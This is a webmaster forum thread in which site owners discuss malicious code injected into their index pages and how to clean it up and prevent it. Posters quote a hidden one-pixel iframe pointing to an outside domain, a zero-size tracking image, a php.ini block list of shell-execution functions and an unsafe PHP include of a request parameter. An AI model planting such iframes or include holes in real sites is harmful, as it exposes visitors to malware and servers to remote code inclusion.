oscer

Anyone ever seen that happen from these guys?


Registrant:
Kipec Ineara [email protected] +1.2128816540
Ineara inc
933 po box
New York,NY,US 10081

this is what was injected

iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"</iframe

__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565

HomerSimpson

just hate that injection shit....
never cared much about the code than how to clean it
and prevent from happening again...

__________________
Make a bank with Chaturbate - the best selling webcam program
Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

oscer

Yea backups ... Luckily it was a personal site and i keep multiple backups

__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565

k0nr4d

99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.

__________________
Mechanical Bunny Media
Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

potter

eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.

__________________

Some Guy

That happened to me big-time last month. Every site of mine got hit. Every single index.html or index.php file on my server had random lines of code inserted. It royally fucked-up a few of my sites that used link exchange programs. Hugely annoying. It happened every day for a week. I spent countless hours trying to figure out what was going on. Fixing everything over and over again was a major bitch.

When I asked my hosting company about it (Colo-Cation, the best hosting company ever) they looked into it and told me that, as k0nr4d said, it was more than likely a virus on my own machine that was causing the issue. I ran a virus scan and changed every password on my server and it hasn't happened since.

__________________

Need a Cheap Design? - Cheap Quality Content Available!

Fuck you Michelle Malkin and Fox News

Twoface31

this is shit

__________________

Email: [email protected]
HentaiG4h * Lusty Life
ICQ: 291-953

k0nr4d

Usually files like index.html, index.php, etc are not writable by the http user, so a script would not have permissions to write to them to add said code. There are of course TGP scripts and such which write to flat files (therefor them having to be writable by the web user) which is the exception here.

That being said it's almost always a virus with this kind of thing. If not the site owner, then a designer or programmer they hired, an updater, anyone with ftp access. The first thing anyone should do is change all their passwords as soon as something like this happens.

__________________
Mechanical Bunny Media
Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

oscer

I havent used FTP in a good while ... I have scp program i use ...

I secured Php on the machine !

__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565

BIGTYMER

I had this happen on 12/06 on one my smaller sites. No other sites on the server were hit with it.

<img width=0 height=0 src="http://*REMOVED*.com/count.gif?id=*REMOVED*">

I was hit with malware around the same time...

BIGTYMER

They just reg'd that domain yesterday. I'd try calling that phone # tomorrow and I would report this to their host (Leksim Ltd).

cybermike

I got hit hard on my tgps.. they kept changing the top 2 rows to trafficshop and other urls.. took a while but seems that my host found the backdoors

Very annoying

__________________
Hey surfers how about some The Best Porn Sites

fatfoo

It sucks. Don't inject the wrong thing.

__________________
Send me an email: [email protected]

bl4h

adult-help

i think this is the case most of the times. not our pc. bots scan for holes in scripts.also the server you host or even one account one host can be compromised.

__________________
Adult web templates, Adult WordPress Themes, TGP, MGP..
also Complete Wordpress PaySite Development - Adult WordPress Blog Themes - Free FHG Templates - Free PaySite Script - Adult Tutorials Directory - Adult Domain Marketplace - Adult Jobs

eroticsexxx

Yes, I've heard that injecting stuff into your PeePee hurts.

I wouldn't recommend it.

__________________

TeenCat

they must be a doctors

__________________

magicmike

Yeah I've seen it before, will kill your SE listings as google will flag those sites as dangerous.

__________________
Just Porno with both classic and mobile porn versions.
Gay Porn Our mega gay site tranny porn

seeandsee

learn how to prevent

__________________
BUY MY SIG - 50$/Year

Contact here

john FVC

Have had it happen in the past but the server folk ran a script to clean it up though it did take a few days as we had so much stuff on our servers. We are still with Webair and I think Webair have really got their security sorted out now.

__________________


Convert with your MILF & Mature traffic.

CCBill 50% -60% Revshare

oscer

added this to php.ini

disable_functions=readfile,shell_exec,exec,virtual ,passthru,proc_close,proc_get_status,proc_open,pro c_terminate,system

__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565

myneid

lol, my favorite is finding pages with
<?php
include_once($_REQUEST['page']);
?>

__________________
Tanguy 0x7a69 inc. Programmer/President/CEO
http://www.0x7a69.com
A Leader in Programming since 1996
PHP, Ruby on Rails, MySQL, PCI DSS, and any Technical Consulting

wehateporn

Someone said you can get that one from Torrents

__________________